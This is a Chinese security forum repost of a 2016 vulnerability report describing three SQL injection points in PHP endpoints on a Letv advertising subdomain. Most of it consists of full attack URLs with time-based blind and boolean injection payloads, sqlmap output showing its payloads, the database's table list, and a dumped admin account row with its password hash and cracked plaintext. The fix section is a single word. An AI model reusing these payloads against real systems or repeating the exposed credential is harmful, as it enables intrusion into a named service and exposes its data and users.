HanDs
管理员

[7月漏洞公开] 乐视网某站SQL注入3枚 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

乐视网某站sql注入一枚

详细说明:

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761



几乎每个参数都有注入:

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(user(),16)='[email protected]' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761



请求出现延迟,用户名为:



[email protected]

http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph' or left(database(),2)='ad' and sleep(3) and '1'='1&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761



数据库为ad

漏洞证明:

post请求:



http://ad.hz.letv.com/benzc-class/php/jieda_list.php

参数:



province=1



http://ad.hz.letv.com/benzc-class/php/jieda_list.php



province=1' or '1'='2

返回空

province=1' or '1'='1

返回所有数据





另一处:

post:

http://ad.hz.letv.com/benzc-class/php/jieda_data.php

参数:

jjsonpcallback=jQuery220023386403540783274_1464161522072?province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC&name=%E6%B5%8B%E8%AF%95&daqu=%E6%97%A0&mobile=13800138000' or 1=1 and sleep(4) and '1'='1&sex=0&email=%E6%97%A0&interested=%E6%97%A0&memo2=http%3A%2F%2Fad.hz.letv.com%2Ftest%2Fbenzc%2Findex.html&buyCarTime=%E6%97%A0&jxsdm=%E6%97%A0&memo1=benzc&jxsname=%E5%8C%97%E4%BA%AC%E6%B3%A2%E5%A3%AB%E9%80%9A%E8%BE%BE%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%8D%E5%8A%A1%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8



参数mobile存在注入,or 1=1请求延迟,or 1=2请求不延迟

available databases [2]:

[*] ad

[*] information_schema



sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* ((custom) POST)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: province=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xQWX) AND 'AKoZ'='AKoZ



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: province=1' UNION ALL SELECT CONCAT(0x717a707871,0x4364574254444b78464a6c7a687a744b53664370565654464e78797272684f4b4b7149516b615766,0x7176706271)-- -

---

web application technology: PHP 5.3.19

back-end DBMS: MySQL >= 5.0.0

Database: ad

[91 tables]

+-----------------------------+

| BAM_data |

| CAMRY_data |

| CAMRY_list |

| UserName_data |

| 'Dealer List$'_xlnm#Extract |

| Dealer List |

| a30_people |

| ad_car |

| ad_madinglin_shareNum |

| ad_page_pv_num |

| ad_record |

| ad_voteinfo |

| ad_voterecord |

| ad_wph_cmt |

| ad_wph_online_time |

| ad_wph_tel |

| add_jieqidata |

| audi_2015_list |

| audi_list |

| audi_list_bak |

| audi_list_bak1 |

| audi_list_bak2 |

| audi_list_bak3 |

| baolai_data |

| baolai_list |

| baoshan_user_data |

| baoshan_vip_card |

| baoshan_vip_week |

| benzc_data |

| benzc_list |

| changan_data |

| changan_list |

| createTab |

| diluerweimaData |

| fiesta_car |

| fiesta_list |

| fute_car |

| fute_ld |

| fute_list |

| game_kp_bianhao |

| game_kp_jpk |

| game_kp_user |

| game_yao_info |

| game_yao_jianhao |

| golf_contact |

| golf_data |

| golf_jialv_data |

| golf_jialv_list |

| golf_list |

| golf_people |

| hailan_data |

| hailan_list |

| highlander_data |

| highlander_list |

| hn_list |

| hn_record |

| infiniti_info |

| infiniti_user |

| jieda_data |

| jieda_data_bak_20150504 |

| jieda_list |

| jieda_list_yuan |

| jieda_list_yuan2 |

| jys50_yuyue |

| kadjar_data |

| kadjar_list |

| lingmu_data |

| lingmu_list |

| linmu_list_city |

| meten_phone |

| olay_record |

| olay_vote |

| op_admin_user |

| op_books |

| op_lottery_sys |

| op_signup |

| op_winner_list |

| sj_prize |

| sj_userlist |

| tp_tab |

| tp_tab_ip |

| tz18_jianId |

| tz18_user |

| vezel_contact |

| vezel_people |

| wph_yaoqinma |

| wutaigroup_cont |

| y_prize |

| y_users |

| yifu_list |

| yili |

+-----------------------------+



Table: op_admin_user

[1 entry]

+-----+----------+----------+--------------------------------------------+---------------+

| uid | username | realname | password | lastlogintime |

+-----+----------+----------+--------------------------------------------+---------------+

| 1 | admin | oppo | 408c06609ccabfc09e76f1807156d01c (abc_123) | 1458288536 |

+-----+----------+----------+--------------------------------------------+---------------+



管理员弱口令,打屁屁

修复方案:

过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
视网 S QL
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组
快速回复